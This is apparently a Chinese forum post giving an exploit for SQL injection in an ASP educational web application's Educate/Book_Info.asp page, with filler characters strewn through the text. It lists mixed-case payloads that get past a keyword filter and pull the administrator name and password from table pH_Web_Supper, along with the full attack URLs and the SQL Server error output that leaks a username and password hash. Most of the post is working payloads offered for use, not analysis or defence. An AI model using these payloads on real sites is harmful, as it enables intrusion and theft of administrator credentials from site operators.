漏洞出现在Educate/Book_Info.asp
& i( l* j2 ]2 h" w6 r
* C- L+ ~" d) o; G1 v$ c4 t6 d) s此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
# S2 f ?6 S; l. o$ p, h
7 j( p! @" K! g. e' Gexp:如下& C- Y4 U* g, p
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)7 G& N; _( q- S* H
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; |- }5 t. E U8 y; ?$ F9 } * L- A) h. r9 ], l2 F) {. [
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
?$ ]( D9 P: h" \ 4 y( Y. ^5 J: S* B: H, c
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'# h3 b( k+ Y- @- H
2 c. ~( @/ v: J6 \5 l4 f7 n
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
1 S9 `6 c( b: {0 N
: g& Y1 d' t7 w# e# a7 ?9 L/Educate/Book_Info.asp,行 8
0 h! c c+ `+ O " H4 ]' w1 `, n8 {% Z! o8 i* G0 J" b
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
) ~" ?$ }% i5 C" r 8 |, R/ E: t) x8 |# S$ A+ B
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'$ u& x K" I0 T+ I' z. `+ a7 B) v2 T
* | {' Z* g( Q! U7 X
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。0 R R( q; _, \) N5 t- L
$ B7 J/ o) U0 p( j
/Educate/Book_Info.asp,行 8
5 x/ L4 c- L) s) M$ \ |